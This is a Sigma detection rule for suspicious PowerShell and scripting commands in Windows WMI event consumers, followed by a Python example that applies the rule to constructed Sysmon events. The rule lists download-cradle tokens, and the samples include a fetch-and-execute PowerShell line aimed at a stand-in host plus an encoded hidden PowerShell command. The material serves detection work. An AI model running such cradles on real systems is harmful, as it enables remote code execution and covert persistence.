Suspicious Scripting in a WMI Consumer
Detects suspicious commands that are related to scripting/powershell in WMI Event Consumers
Sigma rule

```yaml
title: Suspicious Scripting in a WMI Consumer
id: fe21810c-2a8c-478f-8dd3-5a287fb2a0e0
status: test
description: Detects suspicious commands that are related to scripting/powershell in WMI Event Consumers
references:
    - https://in.security/an-intro-into-abusing-and-identifying-wmi-event-subscriptions-for-persistence/
    - https://github.com/Neo23x0/signature-base/blob/615bf1f6bac3c1bdc417025c40c073e6c2771a76/yara/gen_susp_lnk_files.yar#L19
    - https://github.com/RiccardoAncarani/LiquidSnake
author: Florian Roth (Nextron Systems), Jonhnathan Ribeiro
date: 2019-04-15
modified: 2023-09-09
tags:
    - attack.execution
    - attack.t1059.005
logsource:
    product: windows
    category: wmi_event
detection:
    selection_destination:
        - Destination|contains|all:
              - 'new-object'
              - 'net.webclient'
              - '.downloadstring'
        - Destination|contains|all:
              - 'new-object'
              - 'net.webclient'
              - '.downloadfile'
        - Destination|contains:
              - ' iex('
              - ' -nop '
              - ' -noprofile '
              - ' -decode '
              - ' -enc '
              - 'WScript.Shell'
              - 'System.Security.Cryptography.FromBase64Transform'
    condition: selection_destination
fields:
    - User
    - Operation
falsepositives:
    - Legitimate administrative scripts
level: high
```
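To show how the `selection_destination` block evaluates, here is an added Python example (not part of the Sigma rule or the Sigma project) that applies the same token groups to a few constructed WMI event consumer records shaped like Sysmon Event ID 20 (the `User`, `Operation` and `Destination` fields the rule names); the event values are constructed, not real telemetry.

```python
from typing import Dict, List

# Token groups copied from the rule's selection_destination block.
# Sigma string matching is case-insensitive unless a modifier says otherwise,
# so tokens are held in lower case and compared against a lower-cased value.
CONTAINS_ALL_GROUPS = [
    ("new-object", "net.webclient", ".downloadstring"),
    ("new-object", "net.webclient", ".downloadfile"),
]
CONTAINS_ANY = [
    " iex(", " -nop ", " -noprofile ", " -decode ", " -enc ",
    "wscript.shell", "system.security.cryptography.frombase64transform",
]


def matches_destination(destination: str) -> bool:
    """True when the Destination value satisfies selection_destination (the
    three list entries are OR'ed; a contains|all entry needs every token)."""
    d = destination.lower()
    if any(all(tok in d for tok in group) for group in CONTAINS_ALL_GROUPS):
        return True
    return any(tok in d for tok in CONTAINS_ANY)


# Constructed sample records (Sysmon Event ID 20 style); the base64 is "ABC" in UTF-16LE.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"User": "CORP\\svc-backup", "Operation": "Created",
     "Destination": "powershell.exe -nop -w hidden -enc QQBCAEMA"},
    {"User": "CORP\\jdoe", "Operation": "Created",
     "Destination": "cmd.exe /c powershell -c IEX(New-Object Net.WebClient)"
                    ".DownloadString('http://example.invalid/s')"},
    {"User": "CORP\\helpdesk", "Operation": "Created",
     "Destination": 'Set sh = CreateObject("WScript.Shell"): sh.Run "notepad.exe"'},
    {"User": "NT AUTHORITY\\SYSTEM", "Operation": "Created",
     "Destination": "C:\\Windows\\System32\\cscript.exe //nologo C:\\Scripts\\inventory.vbs"},
]


def triage(events: List[Dict[str, str]]) -> List[Dict[str, str]]:
    """Apply the rule and keep the rule's `fields` (User, Operation) plus Destination."""
    return [{"User": e["User"], "Operation": e["Operation"], "Destination": e["Destination"]}
            for e in events if matches_destination(e.get("Destination", ""))]


if __name__ == "__main__":
    for hit in triage(SAMPLE_EVENTS):
        print(f"[high] {hit['User']} {hit['Operation']}: {hit['Destination'][:60]}")
```

The last record (a plain cscript.exe invocation of a local .vbs file) is the kind of legitimate administrative script the rule lists as a false-positive source; it does not match because none of the tokens appear in it.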
Related rules
- Adwind RAT / JRAT
- Adwind RAT / JRAT File Artifact
- Csc.EXE Execution Form Potentially Suspicious Parent
- Cscript/Wscript Uncommon Script Extension Execution
- File Was Not Allowed To Run